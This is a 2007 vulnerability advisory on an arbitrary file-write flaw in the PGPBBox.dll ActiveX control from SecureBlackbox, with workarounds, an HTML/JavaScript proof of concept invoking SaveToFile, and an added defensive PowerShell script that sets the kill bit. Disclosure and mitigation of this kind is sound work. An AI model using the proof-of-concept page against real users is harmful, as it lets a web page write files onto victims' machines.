pgpbbox-write.txt
Posted on 13 July 2007
:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

PGPBBox.dll 5.1.0.112 SecureBlackbox Arbitrary Data Write Exploit.
==================================================================
Tested on patched XP SP2 IE 6.0/7.0 and Vista IE 7.0
====================================================

Internal ID: VULWAR200707121.

Introduction
------------
PGPBBox.dll is a library included in the SecureBlackbox software package
from the Eldos Company http://www.eldos.com/

Tested In
---------
- Windows XP SP2 English/French with IE 6.0 / 7.0.
- Windows Vista Professional English/French SP1 with IE 7.0

Summary
-------
The SaveToFile method does not check whether it is being called by the
application or by a malicious user. A remote attacker could craft an HTML
page and write arbitrary data.

Impact
------
Any computer that uses this software is exposed to arbitrary data writes.

Workaround
----------
- Activate the Kill bit zero in clsid: C22BB435-9B7F-4B1F-ACBD-CD36D34D6DFF.
- Unregister PGPBBox.dll using regsvr32.

Timeline
--------
July 12, 2007 -- Bug discovery.
July 12, 2007 -- Bug published.

Credits
-------
* callAX <callax@shellcode.com.ar>
* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>

Technical Details
-----------------
The SaveToFile method receives one argument, filename, in this format:
"c:\path\file".

Proof of Concept
----------------
<HTML>
<BODY>
<object id=ctrl classid="clsid:{C22BB435-9B7F-4B1F-ACBD-CD36D34D6DFF}"></object>
<SCRIPT>
function Poc() {
    arg2="c:\arbitrary_file.txt"
    ctrl.SaveToFile(arg2)
}
</SCRIPT>
<input language=JavaScript onclick=Poc() type=button value="Proof of Concept">
</BODY>
</HTML>
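
The kill-bit workaround listed above, as an added example that is not part of the original advisory: a PowerShell script that ORs the kill bit (0x400) into the "Compatibility Flags" value for the advisory's CLSID in both the native and 32-bit registry views, keeps any flags already present, and reads the result back. The registry location and flag value are the standard Internet Explorer kill-bit mechanism; the helper name Set-KillBit is hypothetical.

```powershell
# Added example: set and verify the Internet Explorer kill bit for the
# CLSID given in the advisory. Run from an elevated 64-bit PowerShell prompt.
$Clsid   = '{C22BB435-9B7F-4B1F-ACBD-CD36D34D6DFF}'  # CLSID from the advisory
$KillBit = 0x400                                      # COMPAT_EVIL_DONT_LOAD
$Name    = 'Compatibility Flags'

# Native view plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Set-KillBit {   # hypothetical helper name
    param([string]$Root, [string]$Clsid)

    $key = "$Root\$Clsid"
    if (-not (Test-Path -LiteralPath $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Preserve any flags already set on the control; only OR in the kill bit.
    $item    = Get-ItemProperty -LiteralPath $key -Name $Name -ErrorAction SilentlyContinue
    $current = if ($item) { [int]$item.$Name } else { 0 }
    Set-ItemProperty -LiteralPath $key -Name $Name -Value ($current -bor $KillBit) -Type DWord

    # Read back and report so the result can be audited.
    $after = [int](Get-ItemProperty -LiteralPath $key -Name $Name).$Name
    [pscustomobject]@{
        Key     = $key
        Before  = '0x{0:X8}' -f $current
        After   = '0x{0:X8}' -f $after
        Blocked = (($after -band $KillBit) -ne 0)
    }
}

foreach ($root in $Roots) {
    # Skip the Wow6432Node view on 32-bit Windows, where it does not exist.
    if ($root -like '*Wow6432Node*' -and -not (Test-Path 'HKLM:\SOFTWARE\Wow6432Node')) {
        continue
    }
    Set-KillBit -Root $root -Clsid $Clsid
}
```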